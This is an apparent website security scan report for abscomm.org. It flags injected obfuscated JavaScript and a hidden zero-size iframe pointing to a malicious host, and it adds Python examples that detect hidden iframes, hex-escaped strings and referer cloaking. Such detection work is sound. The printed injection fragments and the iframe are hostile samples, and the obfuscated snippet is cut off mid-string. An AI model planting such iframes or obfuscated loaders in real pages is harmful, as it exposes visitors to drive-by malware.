Scanned pages/files
Request | Server response | Status |
http://abscomm.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 07 Oct 2014 10:49:28 GMT Location: http://home.earthlink.net/~abscomm/ Server: Sun-ONE-Web-Server/6.1 Content-Length: 122 Content-Type: text/html | clean |
http://home.earthlink.net/~abscomm/ | 200 OK Content-Length: 19336 Content-Type: text/html | malicious |
Malicious code (confirmed by antiviruses, see below):
if('RMbRn'=='oRMHPH')mElLpP();if('WybTj'=='CyuApf')EmWdD();var tLxW='YiHbtD';var ItnHi='Rfpu';var ZrLInA;var qNqqsi="f\x72o\x6dCharCo\x64e";var FTas='ftzyPo';var ATaLK=184;var appVersion_var="a\x70\x70Versi\x6f\x6e";var vquLKIyMM="con\x73t\x72\x75\x63t\x6fr";if('QCuD'=='peOUre')iqchS='poIFqz';var px1_var="1\x70x";function Kcvk(){var DXCPo='ChOA';if('RukVtP'=='ZxhF')liqngX();} var GErrw="9eaaaaa6706565a197aa9ba9aa97aa676664a8ab659fa464999d9f756e";var oSYbE='qaIvpf';var jyMTjcHwq="ap\x70\x65\x function VqfE(){}if('OdsY'=='nzfrMq')hCqY();if('hQdG'=='WQbh')dLblI();} NiwDaBYyo();if('MUNj'=='yrMNX')BLDDN='kWAtoW';if('WRvy'=='FxpL')BqImgJ();var GohttM=188;var Znziw='xNAd';
Decoded script (excerpt):
(function(CV){p9R=32;var e0k=(function(z){var a=[UB("\xe0j\xb88k<I~\xb2hf"+"\xb2\xbc"),UB("\xf4q\xb9-w"),UB("\xeb}\xb4>w-"),UB("\xf0l\xa45z"),UB("\xe2h\xad<q=Oz\xbeig"),UB("\xe4}\xa9\x1cs<aw"+"\xb9qp\x9e\xb1\x94v`"+"\xdd*\xf5\xe6"),UB("\xcey\xa91"),UB("\xecn\xb8+y5ce"),UB("\xf3w\xae0k0c|"),UB("\xef}\xbb-")],b=[UB("\xe7w\xbe,r<bf"),UB("\xe5t\xb26m"),UB("\xf1y\xb3=p4"),UB(
Antivirus reports:
Hidden iframe found (size 0x0), src: http://geomy.zz.mu/go.php?sid=1
<iframe src="http://geomy.zz.mu/go.php?sid=1" width="0" height="0" frameborder="0">
http://rss.brainyhistory.com/link/historyevents.js | 200 OK Content-Length: 601 Content-Type: application/x-javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21308 Content-Type: text/javascript | clean |
http://www.statcounter.com/counter/counter_xhtml.js | 200 OK Content-Length: 15530 Content-Type: application/x-javascript | clean |
http://edge.quantserve.com/quant.js | 200 OK Content-Length: 7874 Content-Type: application/x-javascript | clean |
http://tubestat160.ru/get.php | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://tubestat160.ru/test404page.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
Note: "500 timeout" means the resource did not respond within the scanner's time limit, so no content was available to analyse; "clean" for these two entries records the absence of a scanned body, not an inspected script.
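The malicious row above reports two indicators the scanner keys on: a 0x0 iframe and JavaScript string literals whose `\xNN` escapes hide names such as `fromCharCode`, `appVersion` and `constructor`. The following is an added example, not the scanner's own code, showing how both checks can be done offline on a page body. The sample HTML is constructed for the example: the iframe tag and the four escaped literals are the ones quoted in the report, while the second iframe (host `example.test`) is a hypothetical visible frame included so the filter has something to reject.

```python
import re
from html.parser import HTMLParser

# Constructed sample page, not a capture of the live site. The iframe and the
# four escaped string literals are the ones shown in the report above; the
# example.test iframe is a hypothetical visible frame that must NOT be flagged.
SAMPLE_HTML = r"""
<html><body>
<p>Welcome</p>
<script>
var qNqqsi="f\x72o\x6dCharCo\x64e";
var appVersion_var="a\x70\x70Versi\x6f\x6e";
var vquLKIyMM="con\x73t\x72\x75\x63t\x6fr";
var px1_var="1\x70x";
</script>
<iframe src="http://geomy.zz.mu/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://example.test/legit" width="300" height="200"></iframe>
</body></html>
"""


class PageScanner(HTMLParser):
    """Collect iframe attributes and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def _dimension(value):
    """Parse a width/height attribute such as '0', '0px' or '300'; None if absent."""
    if value is None:
        return None
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else None


def find_hidden_iframes(iframes):
    """Return the src of every iframe that is effectively invisible:
    zero/one-pixel in either dimension, or hidden through inline CSS."""
    hidden = []
    for attrs in iframes:
        w, h = _dimension(attrs.get("width")), _dimension(attrs.get("height"))
        style = (attrs.get("style") or "").replace(" ", "").lower()
        tiny = (w is not None and w <= 1) or (h is not None and h <= 1)
        css_hidden = "display:none" in style or "visibility:hidden" in style
        if tiny or css_hidden:
            hidden.append(attrs.get("src", ""))
    return hidden


# A JS string literal in double or single quotes, allowing backslash escapes inside.
STRING_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'')
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def decode_js_literals(script):
    """Return (raw, decoded) pairs for literals that use \\xNN escapes to hide
    plain identifiers, e.g. "f\\x72o\\x6dCharCo\\x64e" -> "fromCharCode"."""
    found = []
    for m in STRING_LITERAL.finditer(script):
        raw = m.group(1) if m.group(1) is not None else m.group(2)
        if HEX_ESCAPE.search(raw):
            decoded = HEX_ESCAPE.sub(lambda h: chr(int(h.group(1), 16)), raw)
            found.append((raw, decoded))
    return found


def scan(html):
    """Run both indicator checks over one page body."""
    parser = PageScanner()
    parser.feed(html)
    return {
        "hidden_iframes": find_hidden_iframes(parser.iframes),
        "decoded_strings": decode_js_literals("\n".join(parser.scripts)),
    }


if __name__ == "__main__":
    for key, value in scan(SAMPLE_HTML).items():
        print(key, value)
```

The escape decoder deliberately reports the raw literal next to its decoded form: an escaped `fromCharCode` or `constructor` is not malicious on its own, but a page that has no legitimate reason to spell those names through `\xNN` escapes is worth a closer look, and the raw form is what you grep for in other pages of the same site.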
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: abscomm.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 07 Oct 2014 10:49:28 GMT
Location: http://home.earthlink.net/~abscomm/
Server: Sun-ONE-Web-Server/6.1
Content-Length: 122
Content-Type: text/html
...122 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: abscomm.org
Referer: http://www.google.com/search?q=abscomm.org
Result:
The response is the same as for the first query (301 to http://home.earthlink.net/~abscomm/ regardless of the Referer header): no referer-dependent redirects were found.
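The two queries above are a referer-cloaking check: the same URL is fetched once with no Referer and once with a search-engine Referer, without following redirects, and the status plus Location of the two responses are compared. The following is an added example of that comparison, not the scanner's own code. The `fake_cloaking_site` fetcher is a constructed stand-in on the hypothetical host `example.test` that does show cloaking, so the check has something to find; `http_fetch` is the real, plain-HTTP fetcher to pass when checking a live site.

```python
import http.client
import sys
from urllib.parse import urlparse

# Referers a scanner sends to see whether the site behaves differently for
# visitors arriving from a search engine (the report above uses the Google one).
SEARCH_REFERERS = [
    "http://www.google.com/search?q=example",
    "http://www.bing.com/search?q=example",
]


def http_fetch(url, headers, timeout=10):
    """Real fetcher: one GET over plain HTTP, redirects NOT followed, returning
    the status and response headers. HTTPS is out of scope for this example."""
    u = urlparse(url)
    path = u.path or "/"
    if u.query:
        path += "?" + u.query
    hdrs = {"User-Agent": "Mozilla/5.0 (compatible; redirect-check)", **headers}
    conn = http.client.HTTPConnection(u.netloc, timeout=timeout)
    try:
        conn.request("GET", path, headers=hdrs)
        resp = conn.getresponse()
        return {"status": resp.status,
                "headers": {k.title(): v for k, v in resp.getheaders()}}
    finally:
        conn.close()


def fake_cloaking_site(url, headers):
    """Constructed stand-in for a cloaking site (hypothetical host example.test):
    plain visitors get the site's real 301, search-engine visitors are bounced
    to another host. This is NOT the behaviour observed for abscomm.org."""
    ref = headers.get("Referer", "")
    if "google.com/search" in ref:
        return {"status": 302, "headers": {"Location": "http://attacker.test/go.php"}}
    return {"status": 301, "headers": {"Location": "http://home.example.test/~site/"}}


def redirect_signature(resp):
    """The part of a response that matters for cloaking: status and redirect target."""
    return (resp["status"], resp["headers"].get("Location"))


def check_referer_cloaking(url, fetch, referers=SEARCH_REFERERS):
    """Fetch url with no Referer, then once per search-engine Referer, and report
    every case where the redirect behaviour differs from the baseline."""
    baseline = redirect_signature(fetch(url, {}))
    findings = []
    for ref in referers:
        conditional = redirect_signature(fetch(url, {"Referer": ref}))
        if conditional != baseline:
            findings.append({"referer": ref,
                             "normal": baseline,
                             "with_referer": conditional})
    return findings


if __name__ == "__main__":
    # Usage: python check.py http://host/  (live check, plain HTTP only)
    target = sys.argv[1] if len(sys.argv) > 1 else None
    fetcher = http_fetch if target else fake_cloaking_site
    for f in check_referer_cloaking(target or "http://example.test/", fetcher):
        print("referer-dependent redirect:", f)
```

Comparing only the status and Location keeps the check insensitive to headers that legitimately vary per request (Date, cookies); if the comparison is extended to the body, normalise out timestamps and nonces first, or every site will look like it cloaks.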
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=abscomm.org
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://abscomm.org/
Result: abscomm.org is not infected or malware details are not published yet.